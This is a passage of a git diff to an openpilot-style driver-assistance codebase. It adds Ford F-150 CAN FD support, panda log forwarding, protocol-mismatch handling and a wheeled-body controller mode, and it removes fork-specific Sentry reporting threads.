-(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/selfdrive/boardd/boardd_api_impl.pyx b/selfdrive/boardd/boardd_api_impl.pyx index 0d428a925..6a552bb44 100644 --- a/selfdrive/boardd/boardd_api_impl.pyx +++ b/selfdrive/boardd/boardd_api_impl.pyx @@ -4,13 +4,15 @@ from libcpp.vector cimport vector from libcpp.string cimport string from libcpp cimport bool -cdef struct can_frame: - long address - string dat - long busTime - long src +cdef extern from "panda.h": + cdef struct can_frame: + long address + string dat + long busTime + long src -cdef extern void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) +cdef extern from "can_list_to_can_capnp.cc": + void can_list_to_can_capnp_cpp(const vector[can_frame] &can_list, string &out, bool sendCan, bool valid) def can_list_to_can_capnp(can_msgs, msgtype='can', valid=True): cdef vector[can_frame] can_list diff --git a/selfdrive/boardd/boardd_api_impl.so b/selfdrive/boardd/boardd_api_impl.so index e8fc919d9..e36c3705f 100755 Binary files a/selfdrive/boardd/boardd_api_impl.so and b/selfdrive/boardd/boardd_api_impl.so differ diff --git a/selfdrive/boardd/panda.h b/selfdrive/boardd/panda.h index ea9322972..5edca0441 100644 --- a/selfdrive/boardd/panda.h +++ b/selfdrive/boardd/panda.h @@ -72,6 +72,7 @@ public: std::optional get_can_state(uint16_t can_number); void set_loopback(bool loopback); std::optional> get_firmware_version(); + bool up_to_date(); std::optional get_serial(); void set_power_saving(bool power_saving); void enable_deepsleep(); diff --git a/selfdrive/boardd/panda_comms.h b/selfdrive/boardd/panda_comms.h index b07aec509..c102642e5 100644 --- a/selfdrive/boardd/panda_comms.h +++ b/selfdrive/boardd/panda_comms.h @@ -14,7 +14,7 @@ #define TIMEOUT 0 -#define SPI_BUF_SIZE 1024 +#define SPI_BUF_SIZE 2048 // comms base class @@ -74,7 +74,7 @@ private: uint8_t rx_buf[SPI_BUF_SIZE]; inline static std::recursive_mutex hw_lock; - int wait_for_ack(uint8_t ack, uint8_t tx, unsigned int timeout); + int wait_for_ack(uint8_t ack, uint8_t tx, unsigned int timeout, unsigned int length); int bulk_transfer(uint8_t endpoint, uint8_t *tx_data, uint16_t tx_len, uint8_t *rx_data, uint16_t rx_len, unsigned int timeout); int spi_transfer(uint8_t endpoint, uint8_t *tx_data, uint16_t tx_len, uint8_t *rx_data, uint16_t max_rx_len, unsigned int timeout); int spi_transfer_retry(uint8_t endpoint, uint8_t *tx_data, uint16_t tx_len, uint8_t *rx_data, uint16_t max_rx_len, unsigned int timeout); diff --git a/selfdrive/boardd/pandad.py b/selfdrive/boardd/pandad.py index 6ab6d05b0..7cbac9b5d 100755 --- a/selfdrive/boardd/pandad.py +++ b/selfdrive/boardd/pandad.py @@ -3,11 +3,12 @@ import os import usb1 import time +import json import subprocess from typing import List, NoReturn from functools import cmp_to_key -from panda import Panda, PandaDFU, FW_PATH +from panda import Panda, PandaDFU, PandaProtocolMismatch, FW_PATH from common.basedir import BASEDIR from common.params import Params from selfdrive.boardd.set_time import set_time @@ -23,9 +24,56 @@ def get_expected_signature(panda: Panda) -> bytes: cloudlog.exception("Error computing expected signature") return b"" +def read_panda_logs(panda: Panda) -> None: + """ + Forward panda logs to the cloud + """ + + params = Params() + serial = panda.get_usb_serial() + + log_state = {} + try: + l = json.loads(params.get("PandaLogState")) + for k, v in l.items(): + if isinstance(k, str) and isinstance(v, int): + log_state[k] = v + except (TypeError, json.JSONDecodeError): + cloudlog.exception("failed to parse PandaLogState") + + try: + if serial in log_state: + logs = panda.get_logs(last_id=log_state[serial]) + else: + logs = panda.get_logs(get_all=True) + + # truncate logs to 100 entries if needed + MAX_LOGS = 100 + if len(logs) > MAX_LOGS: + cloudlog.warning(f"Panda {serial} has {len(logs)} logs, truncating to {MAX_LOGS}") + logs = logs[-MAX_LOGS:] + + # update log state + if len(logs) > 0: + log_state[serial] = logs[-1]["id"] + + for log in logs: + if log['timestamp'] is not None: + log['timestamp'] = log['timestamp'].isoformat() + cloudlog.event("panda_log", **log, serial=serial) + + params.put("PandaLogState", json.dumps(log_state)) + except Exception: + cloudlog.exception(f"Error getting logs for panda {serial}") + def flash_panda(panda_serial: str) -> Panda: - panda = Panda(panda_serial) + try: + panda = Panda(panda_serial) + except PandaProtocolMismatch: + cloudlog.warning("detected protocol mismatch, reflashing panda") + HARDWARE.recover_internal_panda() + raise fw_signature = get_expected_signature(panda) internal_panda = panda.is_internal() @@ -45,7 +93,7 @@ def flash_panda(panda_serial: str) -> Panda: if internal_panda: HARDWARE.recover_internal_panda() panda.recover(reset=(not internal_panda)) - cloudlog.info("Done flashing bootloader") + cloudlog.info("Done flashing bootstub") if panda.bootstub: cloudlog.info("Panda still not booting, exiting") @@ -121,7 +169,7 @@ def main() -> NoReturn: # sort pandas to have deterministic order pandas.sort(key=cmp_to_key(panda_sort_cmp)) - panda_serials = list(map(lambda p: p.get_usb_serial(), pandas)) # type: ignore + panda_serials = list(map(lambda p: p.get_usb_serial(), pandas)) # log panda fw versions params.put("PandaSignatures", b','.join(p.get_signature() for p in pandas)) @@ -133,6 +181,8 @@ def main() -> NoReturn: params.put_bool("PandaHeartbeatLost", True) cloudlog.event("heartbeat lost", deviceState=health, serial=panda.get_usb_serial()) + read_panda_logs(panda) + if first_run: if panda.is_internal(): # update time from RTC @@ -152,6 +202,9 @@ def main() -> NoReturn: # a panda was disconnected while setting everything up. let's try again cloudlog.exception("Panda USB exception while setting up") continue + except PandaProtocolMismatch: + cloudlog.exception("pandad.protocol_mismatch") + continue except Exception: cloudlog.exception("pandad.uncaught_exception") continue diff --git a/selfdrive/boardd/tests/test_boardd_loopback.py b/selfdrive/boardd/tests/test_boardd_loopback.py index d0504d6bf..593ccf595 100755 --- a/selfdrive/boardd/tests/test_boardd_loopback.py +++ b/selfdrive/boardd/tests/test_boardd_loopback.py @@ -36,7 +36,7 @@ class TestBoardd(unittest.TestCase): params = Params() params.put_bool("IsOnroad", False) - with Timeout(60, "boardd didn't start"): + with Timeout(90, "boardd didn't start"): sm = messaging.SubMaster(['pandaStates']) while sm.rcv_frame['pandaStates'] < 1 or len(sm['pandaStates']) == 0 or \ any(ps.pandaType == log.PandaState.PandaType.unknown for ps in sm['pandaStates']): diff --git a/selfdrive/car/__init__.py b/selfdrive/car/__init__.py index 74197ad94..bb201bfe0 100644 --- a/selfdrive/car/__init__.py +++ b/selfdrive/car/__init__.py @@ -1,5 +1,4 @@ # functions common among cars -import math from collections import namedtuple from typing import Dict, Optional @@ -186,7 +185,7 @@ class CanBusBase: def __init__(self, CP, fingerprint: Optional[Dict[int, Dict[int, int]]]) -> None: if CP is None: assert fingerprint is not None - num = math.ceil(max([k for k, v in fingerprint.items() if len(v)], default=1) / 4) + num = max([k for k, v in fingerprint.items() if len(v)], default=0) // 4 + 1 else: num = len(CP.safetyConfigs) self.offset = 4 * (num - 1) diff --git a/selfdrive/car/body/carcontroller.py b/selfdrive/car/body/carcontroller.py index 64c5617ef..ee5d3f688 100644 --- a/selfdrive/car/body/carcontroller.py +++ b/selfdrive/car/body/carcontroller.py @@ -1,5 +1,6 @@ import numpy as np +from common.params import Params from common.realtime import DT_CTRL from opendbc.can.packer import CANPacker from selfdrive.car.body import bodycan @@ -23,10 +24,14 @@ class CarController: self.speed_pid = PIDController(0.115, k_i=0.23, rate=1/DT_CTRL) self.balance_pid = PIDController(1300, k_i=0, k_d=280, rate=1/DT_CTRL) self.turn_pid = PIDController(110, k_i=11.5, rate=1/DT_CTRL) + self.wheeled_speed_pid = PIDController(110, k_i=11.5, rate=1/DT_CTRL) self.torque_r_filtered = 0. self.torque_l_filtered = 0. + params = Params() + self.wheeled_body = params.get("WheeledBody") + @staticmethod def deadband_filter(torque, deadband): if torque > 0: @@ -45,19 +50,22 @@ class CarController: # Read these from the joystick # TODO: this isn't acceleration, okay? speed_desired = CC.actuators.accel / 5. - speed_diff_desired = -CC.actuators.steer + speed_diff_desired = -CC.actuators.steer / 2. speed_measured = SPEED_FROM_RPM * (CS.out.wheelSpeeds.fl + CS.out.wheelSpeeds.fr) / 2. speed_error = speed_desired - speed_measured - freeze_integrator = ((speed_error < 0 and self.speed_pid.error_integral <= -MAX_POS_INTEGRATOR) or - (speed_error > 0 and self.speed_pid.error_integral >= MAX_POS_INTEGRATOR)) - angle_setpoint = self.speed_pid.update(speed_error, freeze_integrator=freeze_integrator) + if self.wheeled_body is None: + freeze_integrator = ((speed_error < 0 and self.speed_pid.error_integral <= -MAX_POS_INTEGRATOR) or + (speed_error > 0 and self.speed_pid.error_integral >= MAX_POS_INTEGRATOR)) + angle_setpoint = self.speed_pid.update(speed_error, freeze_integrator=freeze_integrator) - # Clip angle error, this is enough to get up from stands - angle_error = np.clip((-CC.orientationNED[1]) - angle_setpoint, -MAX_ANGLE_ERROR, MAX_ANGLE_ERROR) - angle_error_rate = np.clip(-CC.angularVelocity[1], -1., 1.) - torque = self.balance_pid.update(angle_error, error_rate=angle_error_rate) + # Clip angle error, this is enough to get up from stands + angle_error = np.clip((-CC.orientationNED[1]) - angle_setpoint, -MAX_ANGLE_ERROR, MAX_ANGLE_ERROR) + angle_error_rate = np.clip(-CC.angularVelocity[1], -1., 1.) + torque = self.balance_pid.update(angle_error, error_rate=angle_error_rate) + else: + torque = self.wheeled_speed_pid.update(speed_error, freeze_integrator=False) speed_diff_measured = SPEED_FROM_RPM * (CS.out.wheelSpeeds.fl - CS.out.wheelSpeeds.fr) turn_error = speed_diff_measured - speed_diff_desired diff --git a/selfdrive/car/car_helpers.py b/selfdrive/car/car_helpers.py index e87da36ce..94af73fe8 100644 --- a/selfdrive/car/car_helpers.py +++ b/selfdrive/car/car_helpers.py @@ -4,7 +4,7 @@ from typing import Dict, List from cereal import car from common.params import Params from common.basedir import BASEDIR -# from system.version import is_comma_remote, is_tested_branch +from system.version import is_comma_remote, is_tested_branch from selfdrive.car.interfaces import get_interface_attr from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_legacy_fingerprint_cars from selfdrive.car.vin import get_vin, is_valid_vin, VIN_UNKNOWN @@ -13,11 +13,6 @@ from system.swaglog import cloudlog import cereal.messaging as messaging from selfdrive.car import gen_empty_fingerprint -import threading -import requests -import time -import selfdrive.sentry as sentry - EventName = car.CarEvent.EventName @@ -90,18 +85,18 @@ def fingerprint(logcan, sendcan, num_pandas): dp_car_assigned = Params().get('dp_car_assigned', encoding='utf8') if not fixed_fingerprint and dp_car_assigned is not None: - car_selected = dp_car_assigned.strip() - fixed_fingerprint = car_selected + fixed_fingerprint = dp_car_assigned.strip() + skip_fw_query = True - if not fixed_fingerprint and not skip_fw_query: + if not skip_fw_query: # Vin query only reliably works through OBDII bus = 1 cached_params = params.get("CarParamsCache") if cached_params is not None: - cached_params = car.CarParams.from_bytes(cached_params) - if cached_params.carName == "mock": - cached_params = None + with car.CarParams.from_bytes(cached_params) as cached_params: + if cached_params.carName == "mock": + cached_params = None if cached_params is not None and len(cached_params.carFw) > 0 and \ cached_params.carVin is not VIN_UNKNOWN and not disable_fw_cache: @@ -190,41 +185,6 @@ def fingerprint(logcan, sendcan, num_pandas): fw_count=len(car_fw), ecu_responses=list(ecu_rx_addrs), vin_rx_addr=vin_rx_addr, error=True) return car_fingerprint, finger, vin, car_fw, source, exact_match -#dp -def is_connected_to_internet(timeout=5): - try: - requests.get("https://sentry.io", timeout=timeout) - return True - except Exception: - return False - - -def crash_log(candidate): - no_internet = 0 - while True: - if is_connected_to_internet(): - sentry.capture_warning("fingerprinted %s" % candidate) - break - else: - no_internet += 1 - if no_internet >= 2: - break - time.sleep(600) - - -def crash_log2(fingerprints, fw): - no_internet = 0 - while True: - if is_connected_to_internet(): - sentry.capture_warning("car doesn't match any fingerprints: %s" % fingerprints) - sentry.capture_warning("car doesn't match any fw: %s" % fw) - break - else: - no_internet += 1 - if no_internet >= 2: - break - time.sleep(600) - def get_car(logcan, sendcan, experimental_long_allowed, num_pandas=1): candidate, fingerprints, vin, car_fw, source, exact_match = fingerprint(logcan, sendcan, num_pandas) @@ -233,20 +193,11 @@ def get_car(logcan, sendcan, experimental_long_allowed, num_pandas=1): cloudlog.event("car doesn't match any fingerprints", fingerprints=fingerprints, error=True) candidate = "mock" - y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,)) - y.start() + CarInterface, CarController, CarState = interfaces[candidate] + CP = CarInterface.get_params(candidate, fingerprints, car_fw, experimental_long_allowed, docs=False) + CP.carVin = vin + CP.carFw = car_fw + CP.fingerprintSource = source + CP.fuzzyFingerprint = not exact_match - x = threading.Thread(target=crash_log, args=(candidate,)) - x.start() - - try: - CarInterface, CarController, CarState = interfaces[candidate] - CP = CarInterface.get_params(candidate, fingerprints, car_fw, experimental_long_allowed, docs=False) - CP.carVin = vin - CP.carFw = car_fw - CP.fingerprintSource = source - CP.fuzzyFingerprint = not exact_match - - return CarInterface(CP, CarController, CarState), CP - except KeyError: - return None, None + return CarInterface(CP, CarController, CarState), CP diff --git a/selfdrive/car/chrysler/interface.py b/selfdrive/car/chrysler/interface.py index 516ec5d17..22b207388 100755 --- a/selfdrive/car/chrysler/interface.py +++ b/selfdrive/car/chrysler/interface.py @@ -78,9 +78,6 @@ class CarInterface(CarInterfaceBase): else: raise ValueError(f"Unsupported car: {candidate}") - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - if ret.flags & ChryslerFlags.HIGHER_MIN_STEERING_SPEED: # TODO: allow these cars to steer down to 13 m/s if already engaged. ret.minSteerSpeed = 17.5 # m/s 17 on the way up, 13 on the way down once engaged. diff --git a/selfdrive/car/disable_ecu.py b/selfdrive/car/disable_ecu.py index ed98e14dc..36ebe12fa 100755 --- a/selfdrive/car/disable_ecu.py +++ b/selfdrive/car/disable_ecu.py @@ -7,22 +7,22 @@ EXT_DIAG_RESPONSE = b'\x50\x03' COM_CONT_RESPONSE = b'' -def disable_ecu(logcan, sendcan, bus=0, addr=0x7d0, com_cont_req=b'\x28\x83\x01', timeout=0.1, retry=10, debug=False): +def disable_ecu(logcan, sendcan, bus=0, addr=0x7d0, sub_addr=None, com_cont_req=b'\x28\x83\x01', timeout=0.1, retry=10, debug=False): """Silence an ECU by disabling sending and receiving messages using UDS 0x28. The ECU will stay silent as long as openpilot keeps sending Tester Present. This is used to disable the radar in some cars. Openpilot will emulate the radar. WARNING: THIS DISABLES AEB!""" - cloudlog.warning(f"ecu disable {hex(addr)} ...") + cloudlog.warning(f"ecu disable {hex(addr), sub_addr} ...") for i in range(retry): try: - query = IsoTpParallelQuery(sendcan, logcan, bus, [addr], [EXT_DIAG_REQUEST], [EXT_DIAG_RESPONSE], debug=debug) + query = IsoTpParallelQuery(sendcan, logcan, bus, [(addr, sub_addr)], [EXT_DIAG_REQUEST], [EXT_DIAG_RESPONSE], debug=debug) for _, _ in query.get_data(timeout).items(): cloudlog.warning("communication control disable tx/rx ...") - query = IsoTpParallelQuery(sendcan, logcan, bus, [addr], [com_cont_req], [COM_CONT_RESPONSE], debug=debug) + query = IsoTpParallelQuery(sendcan, logcan, bus, [(addr, sub_addr)], [com_cont_req], [COM_CONT_RESPONSE], debug=debug) query.get_data(0) cloudlog.warning("ecu disabled") diff --git a/selfdrive/car/docs_definitions.py b/selfdrive/car/docs_definitions.py index d3bba6f59..5db720b8f 100644 --- a/selfdrive/car/docs_definitions.py +++ b/selfdrive/car/docs_definitions.py @@ -149,7 +149,7 @@ class CarParts: return copy.deepcopy(self) @classmethod - def common(cls, add: List[EnumBase] = None, remove: List[EnumBase] = None): + def common(cls, add: Optional[List[EnumBase]] = None, remove: Optional[List[EnumBase]] = None): p = [part for part in (add or []) + DEFAULT_CAR_PARTS if part not in (remove or [])] return cls(p) diff --git a/selfdrive/car/ford/carcontroller.py b/selfdrive/car/ford/carcontroller.py index 2ef80420b..dd30bc57e 100644 --- a/selfdrive/car/ford/carcontroller.py +++ b/selfdrive/car/ford/carcontroller.py @@ -4,7 +4,7 @@ from opendbc.can.packer import CANPacker from selfdrive.car import apply_std_steer_angle_limits from selfdrive.car.ford.fordcan import CanBus, create_acc_msg, create_acc_ui_msg, create_button_msg, \ create_lat_ctl_msg, create_lat_ctl2_msg, create_lka_msg, create_lkas_ui_msg -from selfdrive.car.ford.values import CANFD_CARS, CarControllerParams +from selfdrive.car.ford.values import CANFD_CAR, CarControllerParams LongCtrlState = car.CarControl.Actuators.LongControlState VisualAlert = car.CarControl.HUDControl.VisualAlert @@ -69,7 +69,7 @@ class CarController: self.apply_curvature_last = apply_curvature - if self.CP.carFingerprint in CANFD_CARS: + if self.CP.carFingerprint in CANFD_CAR: # TODO: extended mode mode = 1 if CC.latActive else 0 counter = (self.frame // CarControllerParams.STEER_STEP) % 0xF diff --git a/selfdrive/car/ford/carstate.py b/selfdrive/car/ford/carstate.py index dfa5c8f5b..d9848096e 100644 --- a/selfdrive/car/ford/carstate.py +++ b/selfdrive/car/ford/carstate.py @@ -4,7 +4,7 @@ from opendbc.can.can_define import CANDefine from opendbc.can.parser import CANParser from selfdrive.car.interfaces import CarStateBase from selfdrive.car.ford.fordcan import CanBus -from selfdrive.car.ford.values import DBC, CarControllerParams +from selfdrive.car.ford.values import CANFD_CAR, CarControllerParams, DBC GearShifter = car.CarState.GearShifter TransmissionType = car.CarParams.TransmissionType @@ -55,6 +55,10 @@ class CarState(CarStateBase): ret.steerFaultPermanent = cp.vl["EPAS_INFO"]["EPAS_Failure"] in (2, 3) # ret.espDisabled = False # TODO: find traction control signal + if self.CP.carFingerprint in CANFD_CAR: + # this signal is always 0 on non-CAN FD cars + ret.steerFaultTemporary |= cp.vl["Lane_Assist_Data3_FD1"]["LatCtlSte_D_Stat"] not in (1, 2, 3) + # cruise state ret.cruiseState.speed = cp.vl["EngBrakeData"]["Veh_V_DsplyCcSet"] * CV.MPH_TO_MS ret.cruiseState.enabled = cp.vl["EngBrakeData"]["CcStat_D_Actl"] in (4, 5) @@ -93,8 +97,9 @@ class CarState(CarStateBase): # blindspot sensors if self.CP.enableBsm: - ret.leftBlindspot = cp.vl["Side_Detect_L_Stat"]["SodDetctLeft_D_Stat"] != 0 - ret.rightBlindspot = cp.vl["Side_Detect_R_Stat"]["SodDetctRight_D_Stat"] != 0 + cp_bsm = cp_cam if self.CP.carFingerprint in CANFD_CAR else cp + ret.leftBlindspot = cp_bsm.vl["Side_Detect_L_Stat"]["SodDetctLeft_D_Stat"] != 0 + ret.rightBlindspot = cp_bsm.vl["Side_Detect_R_Stat"]["SodDetctRight_D_Stat"] != 0 # Stock steering buttons so that we can passthru blinkers etc. self.buttons_stock_values = cp.vl["Steering_Data_FD1"] @@ -181,12 +186,19 @@ class CarState(CarStateBase): ("Cluster_Info1_FD1", 10), ("SteeringPinion_Data", 100), ("EPAS_INFO", 50), - ("Lane_Assist_Data3_FD1", 33), ("Steering_Data_FD1", 10), ("BodyInfo_3_FD1", 2), ("RCMStatusMessage2_FD1", 10), ] + if CP.carFingerprint in CANFD_CAR: + signals += [ + ("LatCtlSte_D_Stat", "Lane_Assist_Data3_FD1"), # PSCM lateral control status + ] + checks += [ + ("Lane_Assist_Data3_FD1", 33), + ] + if CP.transmissionType == TransmissionType.automatic: signals += [ ("TrnRng_D_RqGsm", "Gear_Shift_by_Wire_FD1"), # GWM transmission gear position @@ -204,7 +216,7 @@ class CarState(CarStateBase): ("BCM_Lamp_Stat_FD1", 1), ] - if CP.enableBsm: + if CP.enableBsm and CP.carFingerprint not in CANFD_CAR: signals += [ ("SodDetctLeft_D_Stat", "Side_Detect_L_Stat"), # Blindspot sensor, left ("SodDetctRight_D_Stat", "Side_Detect_R_Stat"), # Blindspot sensor, right @@ -274,4 +286,14 @@ class CarState(CarStateBase): ("IPMA_Data", 1), ] + if CP.enableBsm and CP.carFingerprint in CANFD_CAR: + signals += [ + ("SodDetctLeft_D_Stat", "Side_Detect_L_Stat"), # Blindspot sensor, left + ("SodDetctRight_D_Stat", "Side_Detect_R_Stat"), # Blindspot sensor, right + ] + checks += [ + ("Side_Detect_L_Stat", 5), + ("Side_Detect_R_Stat", 5), + ] + return CANParser(DBC[CP.carFingerprint]["pt"], signals, checks, CanBus(CP).camera) diff --git a/selfdrive/car/ford/interface.py b/selfdrive/car/ford/interface.py index d1dfd801d..d74baa3ce 100644 --- a/selfdrive/car/ford/interface.py +++ b/selfdrive/car/ford/interface.py @@ -4,7 +4,7 @@ from panda import Panda from common.conversions import Conversions as CV from selfdrive.car import STD_CARGO_KG, get_safety_config from selfdrive.car.ford.fordcan import CanBus -from selfdrive.car.ford.values import CAR, Ecu +from selfdrive.car.ford.values import CANFD_CAR, CAR, Ecu from selfdrive.car.interfaces import CarInterfaceBase TransmissionType = car.CarParams.TransmissionType @@ -15,6 +15,7 @@ class CarInterface(CarInterfaceBase): @staticmethod def _get_params(ret, candidate, fingerprint, car_fw, experimental_long, docs): ret.carName = "ford" + ret.dashcamOnly = candidate in {CAR.F_150_MK14} ret.radarUnavailable = True ret.steerControlType = car.CarParams.SteerControlType.angle @@ -32,6 +33,9 @@ class CarInterface(CarInterfaceBase): ret.safetyConfigs[-1].safetyParam |= Panda.FLAG_FORD_LONG_CONTROL ret.openpilotLongitudinalControl = True + if candidate in CANFD_CAR: + ret.safetyConfigs[-1].safetyParam |= Panda.FLAG_FORD_CANFD + if candidate == CAR.BRONCO_SPORT_MK1: ret.wheelbase = 2.67 ret.steerRatio = 17.7 @@ -47,6 +51,12 @@ class CarInterface(CarInterfaceBase): ret.steerRatio = 16.8 ret.mass = 2050 + STD_CARGO_KG + elif candidate == CAR.F_150_MK14: + # required trim only on SuperCrew + ret.wheelbase = 3.69 + ret.steerRatio = 17.0 + ret.mass = 2000 + STD_CARGO_KG + elif candidate == CAR.FOCUS_MK4: ret.wheelbase = 2.7 ret.steerRatio = 15.0 @@ -60,9 +70,6 @@ class CarInterface(CarInterfaceBase): else: raise ValueError(f"Unsupported car: {candidate}") - CarInterfaceBase.dp_lat_tune_collection(candidate, ret.latTuneCollection) - CarInterfaceBase.configure_dp_tune(ret.lateralTuning, ret.latTuneCollection) - # Auto Transmission: 0x732 ECU or Gear_Shift_by_Wire_FD1 found_ecus = [fw.ecu for fw in car_fw] if Ecu.shiftByWire in found_ecus or 0x5A in fingerprint[CAN.main] or docs: @@ -86,7 +93,6 @@ class CarInterface(CarInterfaceBase): ret = self.CS.update(self.cp, self.cp_cam) events = self.create_common_events(ret, extra_gears=[GearShifter.manumatic]) - events = self.dp_atl_warning(ret, events) if not self.CS.vehicle_sensors_valid: events.add(car.CarEvent.EventName.vehicleSensorsInvalid) if self.CS.hybrid_platform: diff --git a/selfdrive/car/ford/values.py b/selfdrive/car/ford/values.py index 0c4e612d9..7ce0abb21 100644 --- a/selfdrive/car/ford/values.py +++ b/selfdrive/car/ford/values.py @@ -1,7 +1,7 @@ from collections import defaultdict from dataclasses import dataclass, field from enum import Enum -from typing import Dict, List, Set, Union +from typing import Dict, List, Union from cereal import car from selfdrive.car import AngleRateLimit, dbc_dict @@ -44,11 +44,12 @@ class CAR: BRONCO_SPORT_MK1 = "FORD BRONCO SPORT 1ST GEN" ESCAPE_MK4 = "FORD ESCAPE 4TH GEN" EXPLORER_MK6 = "FORD EXPLORER 6TH GEN" + F_150_MK14 = "FORD F-150 14TH GEN" FOCUS_MK4 = "FORD FOCUS 4TH GEN" MAVERICK_MK1 = "FORD MAVERICK 1ST GEN" -CANFD_CARS: Set[str] = set() +CANFD_CAR = {CAR.F_150_MK14} class RADAR: @@ -58,6 +59,9 @@ class RADAR: DBC: Dict[str, Dict[str, str]] = defaultdict(lambda: dbc_dict("ford_lincoln_base_pt", RADAR.DELPHI_MRR)) +# F-150 radar is not yet supported +DBC[CAR.F_150_MK14] = dbc_dict("ford_lincoln_base_pt", None) + class Footnote(Enum): FOCUS = CarFootnote( @@ -87,22 +91,28 @@ CAR_INFO: Dict[str, Union[CarInfo, List[CarInfo]]] = { FordCarInfo("Ford Explorer 2020-22"), FordCarInfo("Lincoln Aviator 2020-21", "Co-Pilot360 Plus"), ], + CAR.F_150_MK14: FordCarInfo("Ford F-150 2023", "Co-Pilot360 Active 2.0"), CAR.FOCUS_MK4: FordCarInfo("Ford Focus 2018", "Adaptive Cruise Control with Lane Centering", footnotes=[Footnote.FOCUS]), CAR.MAVERICK_MK1: FordCarInfo("Ford Maverick 2022-23", "Co-Pilot360 Assist"), } FW_QUERY_CONFIG = FwQueryConfig( requests=[ + # CAN and CAN FD queries are combined. + # FIXME: For CAN FD, ECUs respond with frames larger than 8 bytes on the powertrain bus + # TODO: properly handle auxiliary requests to separate queries and add back whitelists Request( [StdQueries.TESTER_PRESENT_REQUEST, StdQueries.MANUFACTURER_SOFTWARE_VERSION_REQUEST], [StdQueries.TESTER_PRESENT_RESPONSE, StdQueries.MANUFACTURER_SOFTWARE_VERSION_RESPONSE], - whitelist_ecus=[Ecu.engine], + # whitelist_ecus=[Ecu.engine], + auxiliary=True, ), Request( [StdQueries.TESTER_PRESENT_REQUEST, StdQueries.MANUFACTURER_SOFTWARE_VERSION_REQUEST], [StdQueries.TESTER_PRESENT_RESPONSE, StdQueries.MANUFACTURER_SOFTWARE_VERSION_RESPONSE], + # whitelist_ecus=[Ecu.eps, Ecu.abs, Ecu.fwdRadar, Ecu.fwdCamera, Ecu.shiftByWire], bus=0, - whitelist_ecus=[Ecu.eps, Ecu.abs, Ecu.fwdRadar, Ecu.fwdCamera, Ecu.shiftByWire], + auxiliary=True, ), ], extra_ecus=[ @@ -158,8 +168,8 @@ FW_VERSIONS = { b'LX6A-14C204-ESG\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'MX6A-14C204-BEF\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'MX6A-14C204-BEJ\x00\x00\x00\x00\x00\x00\x00\x00\x00', - b'NX6A-14C204-BLE\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'MX6A-14C204-CAB\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'NX6A-14C204-BLE\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], }, CAR.EXPLORER_MK6: { @@ -168,6 +178,7 @@ FW_VERSIONS = { b'L1MC-14D003-AK\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'L1MC-14D003-AL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'M1MC-14D003-AB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'M1MC-14D003-AC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], (Ecu.abs, 0x760, None): [ b'L1MC-2D053-AJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', @@ -192,9 +203,27 @@ FW_VERSIONS = { b'LB5A-14C204-EAC\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'MB5A-14C204-MD\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'MB5A-14C204-RC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + b'NB5A-14C204-AZD\x00\x00\x00\x00\x00\x00\x00\x00\x00', b'NB5A-14C204-HB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', ], }, + CAR.F_150_MK14: { + (Ecu.eps, 0x730, None): [ + b'ML3V-14D003-BC\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ], + (Ecu.abs, 0x760, None): [ + b'PL34-2D053-CA\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ], + (Ecu.fwdRadar, 0x764, None): [ + b'ML3T-14D049-AL\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ], + (Ecu.fwdCamera, 0x706, None): [ + b'PJ6T-14H102-ABJ\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ], + (Ecu.engine, 0x7E0, None): [ + b'PL3A-14C204-BRB\x00\x00\x00\x00\x00\x00\x00\x00\x00', + ], + }, CAR.FOCUS_MK4: { (Ecu.eps, 0x730, None): [ b'JX6C-14D003-AH\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00', diff --git a/selfdrive/car/gm/carcontroller.py b/selfdrive/car/gm/carcontroller.py index 2a996c0ff..f439eab48 100644 --- a/selfdrive/car/gm/carcontroller.py +++ b/selfdrive/car/gm/carcontroller.py @@ -85,6 +85,7 @@ class CarController: if self.CP.openpilotLongitudinalControl: # Gas/regen, brakes, and UI commands - all at 25Hz if self.frame % 4 == 0: + stopping = 